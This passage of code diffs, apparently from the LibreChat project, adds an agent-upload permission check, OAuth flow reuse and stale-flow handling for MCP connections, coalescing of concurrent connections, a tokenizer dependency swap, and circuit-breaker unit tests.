@@ -7,6 +7,7 @@ export default {
 '\\.dev\\.ts$',
 '\\.helper\\.ts$',
 '\\.helper\\.d\\.ts$',
+'/__tests__/helpers/',
 ],
 coverageReporters: ['text', 'cobertura'],
 testResultsProcessor: 'jest-junit',


@@ -18,8 +18,8 @@
 "build:dev": "npm run clean && NODE_ENV=development rollup -c --bundleConfigAsCjs",
 "build:watch": "NODE_ENV=development rollup -c -w --bundleConfigAsCjs",
 "build:watch:prod": "rollup -c -w --bundleConfigAsCjs",
-"test": "jest --coverage --watch --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.\"",
-"test:ci": "jest --coverage --ci --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.\"",
+"test": "jest --coverage --watch --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.|__tests__/helpers/\"",
+"test:ci": "jest --coverage --ci --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.|__tests__/helpers/\"",
 "test:cache-integration:core": "jest --testPathPatterns=\"src/cache/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false",
 "test:cache-integration:cluster": "jest --testPathPatterns=\"src/cluster/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false --runInBand",
 "test:cache-integration:mcp": "jest --testPathPatterns=\"src/mcp/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false",
@@ -94,6 +94,7 @@
 "@librechat/data-schemas": "*",
 "@modelcontextprotocol/sdk": "^1.27.1",
 "@smithy/node-http-handler": "^4.4.5",
+"ai-tokenizer": "^1.0.6",
 "axios": "^1.13.5",
 "connect-redis": "^8.1.0",
 "eventsource": "^3.0.2",
@@ -116,8 +117,7 @@
 "node-fetch": "2.7.0",
 "pdfjs-dist": "^5.4.624",
 "rate-limit-redis": "^4.2.0",
-"tiktoken": "^1.0.15",
-"undici": "^7.18.2",
+"undici": "^7.24.1",
 "zod": "^3.22.4"
 }
 }


@@ -22,8 +22,9 @@ jest.mock('winston', () => ({
 }));
 // Mock the Tokenizer
-jest.mock('~/utils', () => ({
-Tokenizer: {
+jest.mock('~/utils/tokenizer', () => ({
+__esModule: true,
+default: {
 getTokenCount: jest.fn((text: string) => text.length), // Simple mock: 1 char = 1 token
 },
 }));


@@ -19,7 +19,8 @@ import type { TAttachment, MemoryArtifact } from 'librechat-data-provider';
 import type { BaseMessage, ToolMessage } from '@langchain/core/messages';
 import type { Response as ServerResponse } from 'express';
 import { GenerationJobManager } from '~/stream/GenerationJobManager';
-import { Tokenizer, resolveHeaders, createSafeUser } from '~/utils';
+import { resolveHeaders, createSafeUser } from '~/utils';
+import Tokenizer from '~/utils/tokenizer';
 type RequiredMemoryMethods = Pick<
 MemoryMethods,


@@ -32,14 +32,22 @@ describe('LeaderElection with Redis', () => {
 process.setMaxListeners(200);
 });
-afterEach(async () => {
-await Promise.all(instances.map((instance) => instance.resign()));
-instances = [];
-// Clean up: clear the leader key directly from Redis
+beforeEach(async () => {
 if (keyvRedisClient) {
 await keyvRedisClient.del(LeaderElection.LEADER_KEY);
 }
+new LeaderElection().clearRefreshTimer();
+});
+afterEach(async () => {
+try {
+await Promise.all(instances.map((instance) => instance.resign()));
+} finally {
+instances = [];
+if (keyvRedisClient) {
+await keyvRedisClient.del(LeaderElection.LEADER_KEY);
+}
+}
 });
 afterAll(async () => {


@@ -0,0 +1,113 @@
import type { IUser } from '@librechat/data-schemas';
import type { Response } from 'express';
import type { Types } from 'mongoose';
import { logger } from '@librechat/data-schemas';
import { SystemRoles, ResourceType, PermissionBits } from 'librechat-data-provider';
import type { ServerRequest } from '~/types';
export type AgentUploadAuthResult =
| { allowed: true }
| { allowed: false; status: number; error: string; message: string };
export interface AgentUploadAuthParams {
userId: string;
userRole: string;
agentId?: string;
toolResource?: string | null;
messageFile?: boolean | string;
}
export interface AgentUploadAuthDeps {
getAgent: (params: { id: string }) => Promise<{
_id: string | Types.ObjectId;
author?: string | Types.ObjectId | null;
} | null>;
checkPermission: (params: {
userId: string;
role: string;
resourceType: ResourceType;
resourceId: string | Types.ObjectId;
requiredPermission: number;
}) => Promise<boolean>;
}
export async function checkAgentUploadAuth(
params: AgentUploadAuthParams,
deps: AgentUploadAuthDeps,
): Promise<AgentUploadAuthResult> {
const { userId, userRole, agentId, toolResource, messageFile } = params;
const { getAgent, checkPermission } = deps;
const isMessageAttachment = messageFile === true || messageFile === 'true';
if (!agentId || toolResource == null || isMessageAttachment) {
return { allowed: true };
}
if (userRole === SystemRoles.ADMIN) {
return { allowed: true };
}
const agent = await getAgent({ id: agentId });
if (!agent) {
return { allowed: false, status: 404, error: 'Not Found', message: 'Agent not found' };
}
if (agent.author?.toString() === userId) {
return { allowed: true };
}
const hasEditPermission = await checkPermission({
userId,
role: userRole,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
requiredPermission: PermissionBits.EDIT,
});
if (hasEditPermission) {
return { allowed: true };
}
logger.warn(
`[agentUploadAuth] User ${userId} denied upload to agent ${agentId} (insufficient permissions)`,
);
return {
allowed: false,
status: 403,
error: 'Forbidden',
message: 'Insufficient permissions to upload files to this agent',
};
}
/** @returns true if denied (response already sent), false if allowed */
export async function verifyAgentUploadPermission({
req,
res,
metadata,
getAgent,
checkPermission,
}: {
req: ServerRequest;
res: Response;
metadata: { agent_id?: string; tool_resource?: string | null; message_file?: boolean | string };
getAgent: AgentUploadAuthDeps['getAgent'];
checkPermission: AgentUploadAuthDeps['checkPermission'];
}): Promise<boolean> {
const user = req.user as IUser;
const result = await checkAgentUploadAuth(
{
userId: user.id,
userRole: user.role ?? '',
agentId: metadata.agent_id,
toolResource: metadata.tool_resource,
messageFile: metadata.message_file,
},
{ getAgent, checkPermission },
);
if (!result.allowed) {
res.status(result.status).json({ error: result.error, message: result.message });
return true;
}
return false;
}
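The checks in `checkAgentUploadAuth` form a fixed ladder: message attachments and requests without an agent/tool-resource scope short-circuit to allow, admins bypass ownership checks, a missing agent is a 404, and everyone else needs authorship or EDIT permission. A condensed sketch of that decision order, with the async lookups replaced by plain booleans for illustration (the helper name and inputs are hypothetical):

```typescript
// Decision ladder mirrored from checkAgentUploadAuth; each field stands
// in for the resolved value of one of the real async lookups.
function decideUpload(opts: {
  isMessageAttachment: boolean;
  isAdmin: boolean;
  agentFound: boolean;
  isAuthor: boolean;
  hasEditPermission: boolean;
}): { allowed: boolean; status?: number } {
  if (opts.isMessageAttachment) return { allowed: true }; // per-message files skip agent checks
  if (opts.isAdmin) return { allowed: true };             // admins bypass ownership checks
  if (!opts.agentFound) return { allowed: false, status: 404 };
  if (opts.isAuthor) return { allowed: true };            // the agent's author may always upload
  if (opts.hasEditPermission) return { allowed: true };   // shared EDIT access also suffices
  return { allowed: false, status: 403 };                 // everyone else is denied
}

const denied = decideUpload({
  isMessageAttachment: false,
  isAdmin: false,
  agentFound: true,
  isAuthor: false,
  hasEditPermission: false,
});
console.log(denied); // { allowed: false, status: 403 }
```

Note the ordering: the admin check runs before the agent lookup, so an admin uploading to a nonexistent agent is allowed through rather than receiving the 404.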


@@ -0,0 +1 @@
export * from './auth';


@@ -1,3 +1,4 @@
+export * from './agents';
 export * from './audio';
 export * from './context';
 export * from './documents/crud';


@ -3,6 +3,18 @@ import { logger } from '@librechat/data-schemas';
import type { StoredDataNoRaw } from 'keyv'; import type { StoredDataNoRaw } from 'keyv';
import type { FlowState, FlowMetadata, FlowManagerOptions } from './types'; import type { FlowState, FlowMetadata, FlowManagerOptions } from './types';
export const PENDING_STALE_MS = 2 * 60 * 1000;
const SECONDS_THRESHOLD = 1e10;
/**
* Normalizes an expiration timestamp to milliseconds.
* Timestamps below 10 billion are assumed to be in seconds (valid until ~2286).
*/
export function normalizeExpiresAt(timestamp: number): number {
return timestamp < SECONDS_THRESHOLD ? timestamp * 1000 : timestamp;
}
export class FlowStateManager<T = unknown> { export class FlowStateManager<T = unknown> {
private keyv: Keyv; private keyv: Keyv;
private ttl: number; private ttl: number;
@ -45,32 +57,8 @@ export class FlowStateManager<T = unknown> {
return `${type}:${flowId}`; return `${type}:${flowId}`;
} }
/**
* Normalizes an expiration timestamp to milliseconds.
* Detects whether the input is in seconds or milliseconds based on magnitude.
* Timestamps below 10 billion are assumed to be in seconds (valid until ~2286).
* @param timestamp - The expiration timestamp (in seconds or milliseconds)
* @returns The timestamp normalized to milliseconds
*/
private normalizeExpirationTimestamp(timestamp: number): number {
const SECONDS_THRESHOLD = 1e10;
if (timestamp < SECONDS_THRESHOLD) {
return timestamp * 1000;
}
return timestamp;
}
/**
* Checks if a flow's token has expired based on its expires_at field
* @param flowState - The flow state to check
* @returns true if the token has expired, false otherwise (including if no expires_at exists)
*/
private isTokenExpired(flowState: FlowState<T> | undefined): boolean { private isTokenExpired(flowState: FlowState<T> | undefined): boolean {
if (!flowState?.result) { if (!flowState?.result || typeof flowState.result !== 'object') {
return false;
}
if (typeof flowState.result !== 'object') {
return false; return false;
} }
@ -79,13 +67,11 @@ export class FlowStateManager<T = unknown> {
} }
const expiresAt = (flowState.result as { expires_at: unknown }).expires_at; const expiresAt = (flowState.result as { expires_at: unknown }).expires_at;
if (typeof expiresAt !== 'number' || !Number.isFinite(expiresAt)) { if (typeof expiresAt !== 'number' || !Number.isFinite(expiresAt)) {
return false; return false;
} }
const normalizedExpiresAt = this.normalizeExpirationTimestamp(expiresAt); return normalizeExpiresAt(expiresAt) < Date.now();
return normalizedExpiresAt < Date.now();
} }
/** /**
@ -149,6 +135,8 @@ export class FlowStateManager<T = unknown> {
let elapsedTime = 0; let elapsedTime = 0;
let isCleanedUp = false; let isCleanedUp = false;
let intervalId: NodeJS.Timeout | null = null; let intervalId: NodeJS.Timeout | null = null;
let missingStateRetried = false;
let isRetrying = false;
// Cleanup function to avoid duplicate cleanup // Cleanup function to avoid duplicate cleanup
const cleanup = () => { const cleanup = () => {
@@ -188,17 +176,30 @@ export class FlowStateManager<T = unknown> {
      }

      intervalId = setInterval(async () => {
-        if (isCleanedUp) return;
+        if (isCleanedUp || isRetrying) return;
        try {
-          const flowState = (await this.keyv.get(flowKey)) as FlowState<T> | undefined;
+          let flowState = (await this.keyv.get(flowKey)) as FlowState<T> | undefined;
+          if (!flowState) {
+            if (!missingStateRetried) {
+              missingStateRetried = true;
+              isRetrying = true;
+              logger.warn(
+                `[${flowKey}] Flow state not found, retrying once after 500ms (race recovery)`,
+              );
+              await new Promise((r) => setTimeout(r, 500));
+              flowState = (await this.keyv.get(flowKey)) as FlowState<T> | undefined;
+              isRetrying = false;
+            }
            if (!flowState) {
              cleanup();
-              logger.error(`[${flowKey}] Flow state not found`);
+              logger.error(`[${flowKey}] Flow state not found after retry`);
              reject(new Error(`${type} Flow state not found`));
              return;
            }
+          }

          if (signal?.aborted) {
            cleanup();
@@ -251,10 +252,10 @@ export class FlowStateManager<T = unknown> {
    const flowState = (await this.keyv.get(flowKey)) as FlowState<T> | undefined;
    if (!flowState) {
-      logger.warn('[FlowStateManager] Cannot complete flow - flow state not found', {
-        flowId,
-        type,
-      });
+      logger.warn(
+        '[FlowStateManager] Flow state not found during completion — cannot recover metadata, skipping',
+        { flowId, type },
+      );
      return false;
    }
@@ -297,7 +298,7 @@ export class FlowStateManager<T = unknown> {
  async isFlowStale(
    flowId: string,
    type: string,
-    staleThresholdMs: number = 2 * 60 * 1000,
+    staleThresholdMs: number = PENDING_STALE_MS,
  ): Promise<{ isStale: boolean; age: number; status?: string }> {
    const flowKey = this.getFlowKey(flowId, type);
    const flowState = (await this.keyv.get(flowKey)) as FlowState<T> | undefined;
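The refactor above replaces the private `normalizeExpirationTimestamp` method with a shared `normalizeExpiresAt` helper imported from `~/flow/manager`. Its body is not shown in this diff; a minimal sketch, assuming the helper's job is to accept OAuth `expires_at` values reported in either seconds or milliseconds since the epoch, might look like:

```typescript
// Hypothetical sketch of the shared helper; the threshold constant is an
// assumption for illustration, not the actual LibreChat implementation.
const MS_THRESHOLD = 1e12; // epoch-millisecond timestamps are always above this

export function normalizeExpiresAt(expiresAt: number): number {
  // Treat small values as seconds and scale them to milliseconds,
  // so comparisons against Date.now() are unit-consistent.
  return expiresAt < MS_THRESHOLD ? expiresAt * 1000 : expiresAt;
}
```

With normalization like this, `normalizeExpiresAt(expiresAt) < Date.now()` gives a correct expiry check whether the provider reported seconds or milliseconds.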


@@ -15,6 +2,8 @@ export * from './mcp/errors';
/* Utilities */
export * from './mcp/utils';
export * from './utils';
+export { default as Tokenizer, countTokens } from './utils/tokenizer';
+export type { EncodingName } from './utils/tokenizer';
export * from './db/utils';
/* OAuth */
export * from './oauth';


@@ -2,11 +2,11 @@ import { logger } from '@librechat/data-schemas';
import type { OAuthClientInformation } from '@modelcontextprotocol/sdk/shared/auth.js';
import type { Tool } from '@modelcontextprotocol/sdk/types.js';
import type { TokenMethods } from '@librechat/data-schemas';
-import type { MCPOAuthTokens, OAuthMetadata } from '~/mcp/oauth';
+import type { MCPOAuthTokens, OAuthMetadata, MCPOAuthFlowMetadata } from '~/mcp/oauth';
import type { FlowStateManager } from '~/flow/manager';
-import type { FlowMetadata } from '~/flow/types';
import type * as t from './types';
-import { MCPTokenStorage, MCPOAuthHandler } from '~/mcp/oauth';
+import { MCPTokenStorage, MCPOAuthHandler, ReauthenticationRequiredError } from '~/mcp/oauth';
+import { PENDING_STALE_MS, normalizeExpiresAt } from '~/flow/manager';
import { sanitizeUrlForLogging } from './utils';
import { withTimeout } from '~/utils/promise';
import { MCPConnection } from './connection';
@@ -104,6 +104,7 @@ export class MCPConnectionFactory {
        return { tools, connection, oauthRequired: false, oauthUrl: null };
      }
    } catch {
+      MCPConnection.decrementCycleCount(this.serverName);
      logger.debug(
        `${this.logPrefix} [Discovery] Connection failed, attempting unauthenticated tool listing`,
      );
@@ -125,7 +126,9 @@ export class MCPConnectionFactory {
        }
        return { tools, connection: null, oauthRequired, oauthUrl };
      }
+      MCPConnection.decrementCycleCount(this.serverName);
    } catch (listError) {
+      MCPConnection.decrementCycleCount(this.serverName);
      logger.debug(`${this.logPrefix} [Discovery] Unauthenticated tool listing failed:`, listError);
    }
@@ -265,6 +268,10 @@ export class MCPConnectionFactory {
      if (tokens) logger.info(`${this.logPrefix} Loaded OAuth tokens`);
      return tokens;
    } catch (error) {
+      if (error instanceof ReauthenticationRequiredError) {
+        logger.info(`${this.logPrefix} ${error.message}, will trigger OAuth flow`);
+        return null;
+      }
      logger.debug(`${this.logPrefix} No existing tokens found or error loading tokens`, error);
      return null;
    }
@@ -306,13 +313,23 @@ export class MCPConnectionFactory {
      const existingFlow = await this.flowManager!.getFlowState(flowId, 'mcp_oauth');
      if (existingFlow?.status === 'PENDING') {
-        logger.debug(
-          `${this.logPrefix} PENDING OAuth flow already exists, skipping new initiation`,
-        );
+        const pendingAge = existingFlow.createdAt
+          ? Date.now() - existingFlow.createdAt
+          : Infinity;
+        if (pendingAge < PENDING_STALE_MS) {
+          logger.debug(
+            `${this.logPrefix} Recent PENDING OAuth flow exists (${Math.round(pendingAge / 1000)}s old), skipping new initiation`,
+          );
          connection.emit('oauthFailed', new Error('OAuth flow initiated - return early'));
          return;
        }
+        logger.debug(
+          `${this.logPrefix} Found stale PENDING OAuth flow (${Math.round(pendingAge / 1000)}s old), will replace`,
+        );
+      }

      const {
        authorizationUrl,
        flowId: newFlowId,
@@ -326,11 +343,17 @@ export class MCPConnectionFactory {
      );

      if (existingFlow) {
+        const oldState = (existingFlow.metadata as MCPOAuthFlowMetadata)?.state;
        await this.flowManager!.deleteFlow(newFlowId, 'mcp_oauth');
+        if (oldState) {
+          await MCPOAuthHandler.deleteStateMapping(oldState, this.flowManager!);
+        }
      }

      // Store flow state BEFORE redirecting so the callback can find it
-      await this.flowManager!.initFlow(newFlowId, 'mcp_oauth', flowMetadata);
+      const metadataWithUrl = { ...flowMetadata, authorizationUrl };
+      await this.flowManager!.initFlow(newFlowId, 'mcp_oauth', metadataWithUrl);
+      await MCPOAuthHandler.storeStateMapping(flowMetadata.state, newFlowId, this.flowManager!);

      // Start monitoring in background — createFlow will find the existing PENDING state
      // written by initFlow above, so metadata arg is unused (pass {} to make that explicit)
@@ -495,11 +518,75 @@ export class MCPConnectionFactory {
    const existingFlow = await this.flowManager.getFlowState(flowId, 'mcp_oauth');
    if (existingFlow) {
+      const flowMeta = existingFlow.metadata as MCPOAuthFlowMetadata | undefined;
+      if (existingFlow.status === 'PENDING') {
+        const pendingAge = existingFlow.createdAt
+          ? Date.now() - existingFlow.createdAt
+          : Infinity;
+        if (pendingAge < PENDING_STALE_MS) {
+          logger.debug(
+            `${this.logPrefix} Found recent PENDING OAuth flow (${Math.round(pendingAge / 1000)}s old), joining instead of creating new one`,
+          );
+          const storedAuthUrl = flowMeta?.authorizationUrl;
+          if (storedAuthUrl && typeof this.oauthStart === 'function') {
+            logger.info(
+              `${this.logPrefix} Re-issuing stored authorization URL to caller while joining PENDING flow`,
+            );
+            await this.oauthStart(storedAuthUrl);
+          }
+          const tokens = await this.flowManager.createFlow(flowId, 'mcp_oauth', {}, this.signal);
+          if (typeof this.oauthEnd === 'function') {
+            await this.oauthEnd();
+          }
+          logger.info(
+            `${this.logPrefix} Joined existing OAuth flow completed for ${this.serverName}`,
+          );
+          return {
+            tokens,
+            clientInfo: flowMeta?.clientInfo,
+            metadata: flowMeta?.metadata,
+          };
+        }
+        logger.debug(
+          `${this.logPrefix} Found stale PENDING OAuth flow (${Math.round(pendingAge / 1000)}s old), will delete and start fresh`,
+        );
+      }

+      if (existingFlow.status === 'COMPLETED') {
+        const completedAge = existingFlow.completedAt
+          ? Date.now() - existingFlow.completedAt
+          : Infinity;
+        const cachedTokens = existingFlow.result as MCPOAuthTokens | null | undefined;
+        const isTokenExpired =
+          cachedTokens?.expires_at != null &&
+          normalizeExpiresAt(cachedTokens.expires_at) < Date.now();
+        if (completedAge <= PENDING_STALE_MS && cachedTokens !== undefined && !isTokenExpired) {
+          logger.debug(
+            `${this.logPrefix} Found non-stale COMPLETED OAuth flow, reusing cached tokens`,
+          );
+          return {
+            tokens: cachedTokens,
+            clientInfo: flowMeta?.clientInfo,
+            metadata: flowMeta?.metadata,
+          };
+        }
+      }

      logger.debug(
        `${this.logPrefix} Found existing OAuth flow (status: ${existingFlow.status}), cleaning up to start fresh`,
      );
      try {
+        const oldState = flowMeta?.state;
        await this.flowManager.deleteFlow(flowId, 'mcp_oauth');
+        if (oldState) {
+          await MCPOAuthHandler.deleteStateMapping(oldState, this.flowManager);
+        }
      } catch (error) {
        logger.warn(`${this.logPrefix} Failed to clean up existing OAuth flow`, error);
      }
@@ -519,7 +606,9 @@ export class MCPConnectionFactory {
    );

    // Store flow state BEFORE redirecting so the callback can find it
-    await this.flowManager.initFlow(newFlowId, 'mcp_oauth', flowMetadata as FlowMetadata);
+    const metadataWithUrl = { ...flowMetadata, authorizationUrl };
+    await this.flowManager.initFlow(newFlowId, 'mcp_oauth', metadataWithUrl);
+    await MCPOAuthHandler.storeStateMapping(flowMetadata.state, newFlowId, this.flowManager);

    if (typeof this.oauthStart === 'function') {
      logger.info(`${this.logPrefix} OAuth flow started, issued authorization URL to user`);
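The `MCPOAuthHandler.storeStateMapping` and `deleteStateMapping` calls added above maintain a lookup from the OAuth `state` parameter back to the owning flow id, so the callback route can locate the flow when the provider redirects. A standalone sketch of that idea (illustrative only; the real handler persists the mapping through the flow manager, not an in-memory map):

```typescript
// Illustrative in-memory version of the state -> flowId mapping;
// the names and storage here are assumptions for demonstration.
const stateToFlowId = new Map<string, string>();

export function storeStateMapping(state: string, flowId: string): void {
  stateToFlowId.set(state, flowId);
}

export function resolveStateMapping(state: string): string | undefined {
  return stateToFlowId.get(state);
}

export function deleteStateMapping(state: string): void {
  // Called when a flow is replaced, so a stale `state` can no longer
  // route a late callback to a deleted flow.
  stateToFlowId.delete(state);
}
```

Deleting the old mapping whenever a flow is replaced is what keeps a late-arriving callback from resolving to a flow that no longer exists.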


@@ -1,10 +1,10 @@
import { logger } from '@librechat/data-schemas';
import { ErrorCode, McpError } from '@modelcontextprotocol/sdk/types.js';
+import { MCPConnectionFactory } from '~/mcp/MCPConnectionFactory';
+import { MCPServersRegistry } from '~/mcp/registry/MCPServersRegistry';
+import { MCPConnection } from './connection';
import type * as t from './types';
-import { MCPServersRegistry } from '~/mcp/registry/MCPServersRegistry';
import { ConnectionsRepository } from '~/mcp/ConnectionsRepository';
-import { MCPConnectionFactory } from '~/mcp/MCPConnectionFactory';
-import { MCPConnection } from './connection';
import { mcpConfig } from './mcpConfig';

/**
/** /**
@@ -21,6 +21,8 @@ export abstract class UserConnectionManager {
  protected userConnections: Map<string, Map<string, MCPConnection>> = new Map();
  /** Last activity timestamp for users (not per server) */
  protected userLastActivity: Map<string, number> = new Map();
+  /** In-flight connection promises keyed by `userId:serverName` — coalesces concurrent attempts */
+  protected pendingConnections: Map<string, Promise<MCPConnection>> = new Map();

  /** Updates the last activity timestamp for a user */
  protected updateUserLastActivity(userId: string): void {
@@ -31,8 +33,46 @@ export abstract class UserConnectionManager {
    );
  }

-  /** Gets or creates a connection for a specific user */
-  public async getUserConnection({
+  /** Gets or creates a connection for a specific user, coalescing concurrent attempts */
+  public async getUserConnection(
+    opts: {
+      serverName: string;
+      forceNew?: boolean;
+    } & Omit<t.OAuthConnectionOptions, 'useOAuth'>,
+  ): Promise<MCPConnection> {
+    const { serverName, forceNew, user } = opts;
+    const userId = user?.id;
+    if (!userId) {
+      throw new McpError(ErrorCode.InvalidRequest, `[MCP] User object missing id property`);
+    }
+
+    const lockKey = `${userId}:${serverName}`;
+    if (!forceNew) {
+      const pending = this.pendingConnections.get(lockKey);
+      if (pending) {
+        logger.debug(`[MCP][User: ${userId}][${serverName}] Joining in-flight connection attempt`);
+        return pending;
+      }
+    }
+
+    const connectionPromise = this.createUserConnectionInternal(opts, userId);
+    if (!forceNew) {
+      this.pendingConnections.set(lockKey, connectionPromise);
+    }
+    try {
+      return await connectionPromise;
+    } finally {
+      if (!forceNew && this.pendingConnections.get(lockKey) === connectionPromise) {
+        this.pendingConnections.delete(lockKey);
+      }
+    }
+  }
+
+  private async createUserConnectionInternal(
+    {
      serverName,
      forceNew,
      user,
@@ -48,12 +88,9 @@ export abstract class UserConnectionManager {
    }: {
      serverName: string;
      forceNew?: boolean;
-    } & Omit<t.OAuthConnectionOptions, 'useOAuth'>): Promise<MCPConnection> {
-    const userId = user?.id;
-    if (!userId) {
-      throw new McpError(ErrorCode.InvalidRequest, `[MCP] User object missing id property`);
-    }
+    } & Omit<t.OAuthConnectionOptions, 'useOAuth'>,
+    userId: string,
+  ): Promise<MCPConnection> {
    if (await this.appConnections!.has(serverName)) {
      throw new McpError(
        ErrorCode.InvalidRequest,
@@ -65,6 +102,9 @@ export abstract class UserConnectionManager {
    const userServerMap = this.userConnections.get(userId);
    let connection = forceNew ? undefined : userServerMap?.get(serverName);
+    if (forceNew) {
+      MCPConnection.clearCooldown(serverName);
+    }

    const now = Date.now();
    // Check if user is idle
@@ -185,6 +225,7 @@ export abstract class UserConnectionManager {
  /** Disconnects and removes a specific user connection */
  public async disconnectUserConnection(userId: string, serverName: string): Promise<void> {
+    this.pendingConnections.delete(`${userId}:${serverName}`);
    const userMap = this.userConnections.get(userId);
    const connection = userMap?.get(serverName);
    if (connection) {
@@ -212,6 +253,12 @@ export abstract class UserConnectionManager {
      );
    }
    await Promise.allSettled(disconnectPromises);
+    // Clean up any pending connection promises for this user
+    for (const key of this.pendingConnections.keys()) {
+      if (key.startsWith(`${userId}:`)) {
+        this.pendingConnections.delete(key);
+      }
+    }
    // Ensure user activity timestamp is removed
    this.userLastActivity.delete(userId);
    logger.info(`[MCP][User: ${userId}] All connections processed for disconnection.`);
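The `pendingConnections` map introduced in this diff implements promise coalescing: concurrent callers for the same `userId:serverName` key await a single in-flight attempt instead of opening duplicate connections. The pattern in isolation (names here are illustrative, not the LibreChat API):

```typescript
// Minimal coalescing sketch: the first caller starts the work, later
// callers join its promise, and the entry is removed once it settles.
const pending = new Map<string, Promise<string>>();

export async function connectOnce(
  key: string,
  connect: () => Promise<string>,
): Promise<string> {
  const existing = pending.get(key);
  if (existing) {
    return existing; // join the in-flight attempt
  }
  const attempt = connect();
  pending.set(key, attempt);
  try {
    return await attempt;
  } finally {
    // Only delete our own entry; a newer attempt may have replaced it.
    if (pending.get(key) === attempt) {
      pending.delete(key);
    }
  }
}
```

The guarded delete in the `finally` block mirrors the identity check in `getUserConnection` above: it prevents a settling attempt from evicting a newer promise that was stored under the same key.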


@@ -559,3 +559,242 @@ describe('extractSSEErrorMessage', () => {
    });
  });
});
/**
* Tests for circuit breaker logic.
*
* Uses standalone implementations that mirror the static/private circuit breaker
* methods in MCPConnection. Same approach as the error detection tests above.
*/
describe('MCPConnection Circuit Breaker', () => {
/** 5 cycles within 60s triggers a 30s cooldown */
const CB_MAX_CYCLES = 5;
const CB_CYCLE_WINDOW_MS = 60_000;
const CB_CYCLE_COOLDOWN_MS = 30_000;
/** 3 failed rounds within 120s triggers exponential backoff (30s - 300s) */
const CB_MAX_FAILED_ROUNDS = 3;
const CB_FAILED_WINDOW_MS = 120_000;
const CB_BASE_BACKOFF_MS = 30_000;
const CB_MAX_BACKOFF_MS = 300_000;
interface CircuitBreakerState {
cycleCount: number;
cycleWindowStart: number;
cooldownUntil: number;
failedRounds: number;
failedWindowStart: number;
failedBackoffUntil: number;
}
function createCB(): CircuitBreakerState {
return {
cycleCount: 0,
cycleWindowStart: Date.now(),
cooldownUntil: 0,
failedRounds: 0,
failedWindowStart: Date.now(),
failedBackoffUntil: 0,
};
}
function isCircuitOpen(cb: CircuitBreakerState): boolean {
const now = Date.now();
return now < cb.cooldownUntil || now < cb.failedBackoffUntil;
}
function recordCycle(cb: CircuitBreakerState): void {
const now = Date.now();
if (now - cb.cycleWindowStart > CB_CYCLE_WINDOW_MS) {
cb.cycleCount = 0;
cb.cycleWindowStart = now;
}
cb.cycleCount++;
if (cb.cycleCount >= CB_MAX_CYCLES) {
cb.cooldownUntil = now + CB_CYCLE_COOLDOWN_MS;
cb.cycleCount = 0;
cb.cycleWindowStart = now;
}
}
function recordFailedRound(cb: CircuitBreakerState): void {
const now = Date.now();
if (now - cb.failedWindowStart > CB_FAILED_WINDOW_MS) {
cb.failedRounds = 0;
cb.failedWindowStart = now;
}
cb.failedRounds++;
if (cb.failedRounds >= CB_MAX_FAILED_ROUNDS) {
const backoff = Math.min(
CB_BASE_BACKOFF_MS * Math.pow(2, cb.failedRounds - CB_MAX_FAILED_ROUNDS),
CB_MAX_BACKOFF_MS,
);
cb.failedBackoffUntil = now + backoff;
}
}
function resetFailedRounds(cb: CircuitBreakerState): void {
cb.failedRounds = 0;
cb.failedWindowStart = Date.now();
cb.failedBackoffUntil = 0;
}
beforeEach(() => {
jest.useFakeTimers();
});
afterEach(() => {
jest.useRealTimers();
});
describe('cycle tracking', () => {
it('should not trigger cooldown for fewer than 5 cycles', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
for (let i = 0; i < CB_MAX_CYCLES - 1; i++) {
recordCycle(cb);
}
expect(isCircuitOpen(cb)).toBe(false);
});
it('should trigger 30s cooldown after 5 cycles within 60s', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
for (let i = 0; i < CB_MAX_CYCLES; i++) {
recordCycle(cb);
}
expect(isCircuitOpen(cb)).toBe(true);
jest.advanceTimersByTime(29_000);
expect(isCircuitOpen(cb)).toBe(true);
jest.advanceTimersByTime(1_000);
expect(isCircuitOpen(cb)).toBe(false);
});
it('should reset cycle count when window expires', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
for (let i = 0; i < CB_MAX_CYCLES - 1; i++) {
recordCycle(cb);
}
jest.advanceTimersByTime(CB_CYCLE_WINDOW_MS + 1);
recordCycle(cb);
expect(isCircuitOpen(cb)).toBe(false);
});
});
describe('failed round tracking', () => {
it('should not trigger backoff for fewer than 3 failures', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
for (let i = 0; i < CB_MAX_FAILED_ROUNDS - 1; i++) {
recordFailedRound(cb);
}
expect(isCircuitOpen(cb)).toBe(false);
});
it('should trigger 30s backoff after 3 failures within 120s', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
for (let i = 0; i < CB_MAX_FAILED_ROUNDS; i++) {
recordFailedRound(cb);
}
expect(isCircuitOpen(cb)).toBe(true);
jest.advanceTimersByTime(CB_BASE_BACKOFF_MS);
expect(isCircuitOpen(cb)).toBe(false);
});
it('should use exponential backoff based on failure count', () => {
jest.setSystemTime(Date.now());
const cb = createCB();
for (let i = 0; i < 3; i++) {
recordFailedRound(cb);
}
expect(cb.failedBackoffUntil - Date.now()).toBe(30_000);
recordFailedRound(cb);
expect(cb.failedBackoffUntil - Date.now()).toBe(60_000);
recordFailedRound(cb);
expect(cb.failedBackoffUntil - Date.now()).toBe(120_000);
recordFailedRound(cb);
expect(cb.failedBackoffUntil - Date.now()).toBe(240_000);
// capped at 300s
recordFailedRound(cb);
expect(cb.failedBackoffUntil - Date.now()).toBe(300_000);
});
it('should reset failed window when window expires', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
recordFailedRound(cb);
recordFailedRound(cb);
jest.advanceTimersByTime(CB_FAILED_WINDOW_MS + 1);
recordFailedRound(cb);
expect(isCircuitOpen(cb)).toBe(false);
});
});
describe('resetFailedRounds', () => {
it('should clear failed round state on successful connection', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
for (let i = 0; i < CB_MAX_FAILED_ROUNDS; i++) {
recordFailedRound(cb);
}
expect(isCircuitOpen(cb)).toBe(true);
resetFailedRounds(cb);
expect(isCircuitOpen(cb)).toBe(false);
expect(cb.failedRounds).toBe(0);
